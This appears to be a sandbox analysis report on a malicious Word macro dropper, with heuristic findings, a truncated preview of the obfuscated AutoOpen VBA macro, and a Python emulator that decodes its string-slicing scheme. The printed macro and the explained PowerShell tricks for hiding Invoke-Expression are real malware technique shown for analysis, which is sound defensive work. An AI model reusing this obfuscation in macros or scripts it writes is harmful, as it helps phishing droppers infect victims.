Verdict: MALICIOUS
Risk score: 142
Malware Insights
MITRE ATT&CK
- T1204.002 User Execution: Malicious File
- T1566.001 Phishing: Spearphishing Attachment
The sample is a Microsoft Word (OLE) document carrying a VBA project. The project has an AutoOpen entry point and a Shell() call, and its body is a string-slicing obfuscator: every useful fragment is cut out of a junk string with Left(Right(s, n), m), and the fragments are glued together with Chr(43), i.e. "+", the PowerShell concatenation operator. The fragments visible in the preview below already spell out `owershell &( $SHeLLID[1]+$Shellid[13]+'X')` and `& ((Gv B25*MdR*B25).nAME[` followed by `3,11,2]-JoiN`: two standard ways of producing `iex` (Invoke-Expression) without writing it, since `$ShellId` is "Microsoft.PowerShell" (zero-based indices 1 and 13 are `i` and `e`) and `MaximumDriveCount`, the only automatic variable matching `*MdR*`, has `i`, `e`, `x` at indices 3, 11 and 2. The token B25 appears exactly where PowerShell needs a single quote, so it is most likely a placeholder replaced later in the script. A second-stage download is the usual payload of this pattern, but the preview stops before the command's argument is complete, and the URLs extracted from the document body (below) do not look like real hosts, so no download location is confirmed by this report. The legacy WordBasic auto-exec marker is consistent with an old-style Word macro dropper and is not evidence of a parser exploit.
Heuristics (5)
- VBA macros detected (medium; 2 related findings) OLE_VBA_MACROS: Document contains VBA macro code
- Shell() call in VBA (critical) OLE_VBA_SHELL: Shell() call in VBA
- AutoOpen macro (high) OLE_VBA_AUTOOPEN: AutoOpen macro
- Legacy WordBasic auto-exec macro marker (medium) OLE_LEGACY_WORDBASIC_AUTOEXEC: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself. (Note that this canned description conflicts with the report itself: a VBA project was recovered, see macros.bas below, so read the marker as corroborating the AutoOpen finding rather than as a separate execution path.)
- Embedded URL (info) EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - http://hcqByojNtoPlSw8TA8lilcfM (in document text, OLE body)
  - http://jo8TA8lhUcfMn9YGpatJFIZbx107seZG99WhsB25cAKSx (in document text, OLE body)
  - http://akByojNtoPlSw8TA8lhUcfMB25Gpa (in document text, OLE body)
  - http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Three of the four hostnames are long random-looking strings that share substrings with each other (ByojNtoPlSw8TA8l, 8TA8lhUcfM) and with the macro's junk string pool, and two contain the same B25 token the macro uses as a placeholder; they look like obfuscation residue that happened to follow "http://", not live infrastructure. The fourth is the standard DrawingML XML namespace. None of them should be blocked or hunted as a C2 indicator on this evidence alone.
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 200938 bytes | 320078377720a8556400e9701bc38c538d99d54df7a12c1eecb13a0dd82d8be2 |
Preview script (first 1,000 lines of the extracted script). Reading aid: the quoted strings are the junk pool, each `Left(Right(s, n), m)` line cuts one fragment out of it, `Chr(43)` is "+", and the arithmetic lines operate on undeclared (Empty) variables, so any runtime error they raise is swallowed by `On Error Resume Next` and they never influence the result.

```vba
Attribute VB_Name = "nCDiEEIt"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function PknBwwHEIN()
On Error Resume Next
TmBbzIJfsBv = (TlwLlGO - CDbl(958100) + ZBObRlH + Fix(iipNp / CLng(85841 * Sqr(SGbcwvj))) - 812524 / Sin(tiRdf - CFcKczVRYZJ - 734377 + CLng(BJAJLi)) * 727820 * Fix(958100))
wODaR = "8N1qZthnPJI9vyFcsUmbkiIk2vvowershell JKgTTd&( $SHeLLID[15HoeytcL2vJPe"
ChqdqdE = Left(Right(wODaR, 42), 10) + Left(Right(wODaR, 26), 13)
SXqRE = "]VX"
qSKArjDF = Left(Right(SXqRE, 3), 1)
wPwHqHR = Chr(43)
dMBJt = "kwBbXdVJxrEsdv3Ro27oHh$Shellid[13Q]M"
OALifojfT = Left(Right(dMBJt, 14), 11) + Left(Right(dMBJt, 2), 1)
IuuwDbWfFFC = Chr(43)
iBScVjtuwaf = "r5Vv8ljE[DqBXPqEbnxQvda.nAXZQGBRiSnr& ((Gv B25*MdR*B25)EU0wEDAheMP'X') ( ((' UQRkVxvdvn9JZNRmMrJHo3f44Rcik3l"
dJVwAdAJM = CStr(Left(Right(iBScVjtuwaf, 42), 11)) + Left(Right(iBScVjtuwaf, 72), 19) + Left(Right(iBScVjtuwaf, 85), 3) + CStr(Left(Right(iBScVjtuwaf, 44), 1)) + CStr(Left(Right(iBScVjtuwaf, 101), 2))
LizuhTS = "r5Vv8l25uDqBXPqEbnxQvdnsatXZQGBRiSNB25B25)( (B25nPIFeY8EU0wEBA3,11,2]-JoiswvAUQRkVxvdvn9JZNRmMrJHo3f44"
YtbctuKd = Left(Right(LizuhTS, 40), 11) + CStr(Left(Right(LizuhTS, 68), 17)) + CStr(Left(Right(LizuhTS, 80), 3)) + CStr(Left(Right(LizuhTS, 42), 1)) + Left(Right(LizuhTS, 96), 2)
UXmuKZwM = Chr(43)
BiUtWcGBo = "GptdVtRB256aWAL5fjaB2wMr"
kKCMhjX = Left(Right(BiUtWcGBo, 17), 3) + Left(Right(BiUtWcGBo, 21), 1) + CStr(Left(Right(BiUtWcGBo, 6), 3)) + CStr(Left(Right(BiUtWcGBo, 9), 1))
NhnGi = Chr(43)
fZBWMMr = (rjcpT - CDbl(423859) + OFMoXbknHp + Fix(hwcjnCIl / CLng(23827 * Sqr(zjjLJoiWqv))) - 437427 / Sin(mKstlCWBaj - RLviNPYEdU - 524734 + CLng(iqiYA)) * 648476 * Fix(423859))
FRMkzvGMY = "VtR0Md6aWAB25sJK6w5r4Tf2ePz = &BhmPr"
jRZQwinpc = CStr(Left(Right(FRMkzvGMY, 26), 4)) + Left(Right(FRMkzvGMY, 31), 1) + Left(Right(FRMkzvGMY, 9), 5) + CStr(Left(Right(FRMkzvGMY, 13), 1)) + CStr(Left(Right(FRMkzvGMY, 18), 1))
RKFNUbjLjif = Chr(43)
lGTpwMH = "Gpt(VtRB256aWAL5fjeB2wMr"
CMsQTuGsmZk = Left(Right(lGTpwMH, 17), 3) + Left(Right(lGTpwMH, 21), 1) + CStr(Left(Right(lGTpwMH, 6), 3)) + CStr(Left(Right(lGTpwMH, 9), 1))
VvUTMvVptA = Chr(43)
ZLtAoHcN = "GptWYtR0B25pWALtfjJ56wMneB2jeP"
PWbfTINjh = CStr(Left(Right(ZLtAoHcN, 22), 4)) + CStr(Left(Right(ZLtAoHcN, 26), 1)) + CStr(Left(Right(ZLtAoHcN, 7), 4)) + Left(Right(ZLtAoHcN, 11), 1)
MpEBfdurPm = (ZtDkkjHwj - CDbl(253197) + cHInopBjG + Fix(tOrULj / CLng(451191 * Sqr(htlSdv))) - 615760 / Sin(owWjI - wSSDjiwNro - 207459 + CLng(IIZqKBiZDS)) * 858182 * Fix(253197))
XvaFs = Chr(43)
wmETOtROwm = "Tg5pB2VtR0MfpYW"
qwQVqqZYu = Left(Right(wmETOtROwm, 11), 2) + Left(Right(wmETOtROwm, 13), 1) + CStr(Left(Right(wmETOtROwm, 3), 2))
NZtDozAB = Chr(43)
MLlsO = "TgBpepVtR0Mf2'W"
muFcbWSLon = Left(Right(MLlsO, 11), 2) + Left(Right(MLlsO, 13), 1) + CStr(Left(Right(MLlsO, 3), 2))
XvYRGo = (VpzYikkuLv - CDbl(782542) + iiElSNaEH + Fix(LEOJWb / CLng(207051 * Sqr(FqAiVnO))) - 467999 / Sin(jQizCzFb - aKIldLrB - 692323 + CLng(XKkkPIIVp)) * 269438 * Fix(782542))
oVjLcDWf = Chr(43)
dtuMAEtXM = "5'TgGp"
TFWzd = CStr(Left(Right(dtuMAEtXM, 5), 1)) + CStr(Left(Right(dtuMAEtXM, 6), 1))
JGPWjK = Chr(43)
TtwkcdhmFw = "GptYVtR0B25aWALtf'JKeepY4Tf"
GBQTRQiV = CStr(Left(Right(TtwkcdhmFw, 19), 3)) + CStr(Left(Right(TtwkcdhmFw, 24), 1)) + Left(Right(TtwkcdhmFw, 7), 4) + CStr(Left(Right(TtwkcdhmFw, 10), 1))
OZXwP = (PhvJlFB - CDbl(868230) + cArElIoQJ + Fix(iiWjUIr / CLng(844137 * Sqr(ucGShhd))) - 85293 / Sin(pnuwUwdW - jRXLNNwPHTl - 392374 + CLng(fMmSRKZZKSJ)) * 796508 * Fix(868230))
DZJjATUfw = Chr(43)
KpNTziOvtCj = "'Be"
TvlCzEqPnu = CStr(Left(Right(KpNTziOvtCj, 3), 1))
rqmmzKI = Chr(43)
BZEPVVESHST = "TYGepWVtR0'f"
SwmVFvm = Left(Right(BZEPVVESHST, 9), 2) + CStr(Left(Right(BZEPVVESHST, 11), 1)) + CStr(Left(Right(BZEPVVESHST, 2), 1))
VrnQdih = Chr(43)
jILcUkwv = "Gp-WV'w0Mf65WB2tfj"
sDXDw
```
... (truncated)
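To show how little work the obfuscation really does, here is a small emulator of the macro's slicing scheme. It is an added example written for this page, not code from the analyzer or from the sample: it re-implements VBA's Left/Right semantics, walks the first string-pool and slicing lines copied from the preview above (embedded inline as constructed input), and folds the two PowerShell index tricks into readable text. Two things it assumes, because the truncated preview does not show them: that the final command is concatenated in source order, and that the B25 token stands for a single quote.

```python
"""Emulate the macro's Left(Right(junk, n), m) string-slicing deobfuscator.

Added example (not part of the analyzer report or of the sample): it emulates
the two VBA string functions the macro relies on, walks the preview line by
line, and folds the two PowerShell "spell iex without writing it" tricks.
"""
import re

# Constructed input: the string-pool and slicing lines copied verbatim from the
# macros.bas preview above (attribute lines and junk arithmetic omitted).
MACRO_EXCERPT = r'''
wODaR = "8N1qZthnPJI9vyFcsUmbkiIk2vvowershell JKgTTd&( $SHeLLID[15HoeytcL2vJPe"
ChqdqdE = Left(Right(wODaR, 42), 10) + Left(Right(wODaR, 26), 13)
SXqRE = "]VX"
qSKArjDF = Left(Right(SXqRE, 3), 1)
wPwHqHR = Chr(43)
dMBJt = "kwBbXdVJxrEsdv3Ro27oHh$Shellid[13Q]M"
OALifojfT = Left(Right(dMBJt, 14), 11) + Left(Right(dMBJt, 2), 1)
IuuwDbWfFFC = Chr(43)
iBScVjtuwaf = "r5Vv8ljE[DqBXPqEbnxQvda.nAXZQGBRiSnr& ((Gv B25*MdR*B25)EU0wEDAheMP'X') ( ((' UQRkVxvdvn9JZNRmMrJHo3f44Rcik3l"
dJVwAdAJM = CStr(Left(Right(iBScVjtuwaf, 42), 11)) + Left(Right(iBScVjtuwaf, 72), 19) + Left(Right(iBScVjtuwaf, 85), 3) + CStr(Left(Right(iBScVjtuwaf, 44), 1)) + CStr(Left(Right(iBScVjtuwaf, 101), 2))
LizuhTS = "r5Vv8l25uDqBXPqEbnxQvdnsatXZQGBRiSNB25B25)( (B25nPIFeY8EU0wEBA3,11,2]-JoiswvAUQRkVxvdvn9JZNRmMrJHo3f44"
YtbctuKd = Left(Right(LizuhTS, 40), 11) + CStr(Left(Right(LizuhTS, 68), 17)) + CStr(Left(Right(LizuhTS, 80), 3)) + CStr(Left(Right(LizuhTS, 42), 1)) + Left(Right(LizuhTS, 96), 2)
'''

# $ShellId in Windows PowerShell; MaximumDriveCount is the only automatic
# variable whose name matches the wildcard *MdR* passed to Gv (Get-Variable).
SHELL_ID = "Microsoft.PowerShell"
MAXIMUM_DRIVE_COUNT = "MaximumDriveCount"

STR_ASSIGN = re.compile(r'^(\w+)\s*=\s*"(.*)"$')
CHR_ASSIGN = re.compile(r'^(\w+)\s*=\s*Chr\((\d+)\)$')
SLICE_TERM = re.compile(r'Left\(Right\((\w+),\s*(\d+)\),\s*(\d+)\)')


def vba_left(s: str, n: int) -> str:
    """VBA Left$: first n characters (the whole string if n exceeds its length)."""
    return s[:n]


def vba_right(s: str, n: int) -> str:
    """VBA Right$: last n characters; n = 0 must give "" (s[-0:] would not)."""
    return s[-n:] if n > 0 else ""


def emulate(vba_source: str):
    """Walk the excerpt and return (env, pieces): every variable's final value,
    plus the decoded fragments and Chr() separators in source order."""
    env, pieces = {}, []
    for raw in vba_source.splitlines():
        line = raw.strip()
        if m := STR_ASSIGN.match(line):                  # junk string pool
            env[m.group(1)] = m.group(2)
        elif m := CHR_ASSIGN.match(line):                # Chr(43) = "+"
            env[m.group(1)] = chr(int(m.group(2)))
            pieces.append(env[m.group(1)])
        elif "=" in line and SLICE_TERM.search(line):   # slice-and-concatenate line
            name, rhs = line.split("=", 1)
            value = "".join(vba_left(vba_right(env[src], int(r)), int(l))
                            for src, r, l in SLICE_TERM.findall(rhs))
            env[name.strip()] = value
            pieces.append(value)
    return env, pieces


def decode(vba_source: str, placeholder: str = "B25") -> str:
    """Join the fragments in source order and substitute the placeholder.

    Assumption, not shown in the truncated preview: the final concatenation
    keeps source order, and B25 stands for a single quote (it sits exactly
    where PowerShell needs one: Gv B25*MdR*B25 -> Gv '*MdR*')."""
    _, pieces = emulate(vba_source)
    return "".join(pieces).replace(placeholder, "'")


def fold_iex_tricks(cmd: str) -> str:
    """Resolve the two index tricks so the hidden verb becomes readable:
    $ShellId[1]+$ShellId[13]+'X' -> 'ieX', and
    (Gv '*MdR*').Name[3,11,2]-Join'' -> 'iex'."""
    cmd = re.sub(r"\$shellid\[(\d+)\]",
                 lambda m: "'" + SHELL_ID[int(m.group(1))] + "'", cmd, flags=re.I)
    cmd = re.sub(r"\(Gv '\*MdR\*'\)\.name\[([\d,]+)\]-join''",
                 lambda m: "'" + "".join(MAXIMUM_DRIVE_COUNT[int(i)]
                                         for i in m.group(1).split(",")) + "'",
                 cmd, flags=re.I)
    while (folded := re.sub(r"'([^']*)'\+'([^']*)'", r"'\1\2'", cmd)) != cmd:
        cmd = folded                                     # merge adjacent 'a'+'b' literals
    return cmd


if __name__ == "__main__":
    print(fold_iex_tricks(decode(MACRO_EXCERPT)))
```

Pointed at the full macros.bas from olevba instead of the excerpt, the same loop recovers the rest of the command; the only parts that need a human are the placeholder substitution and the final assembly order, which is why both are isolated in `decode` rather than baked into the emulator.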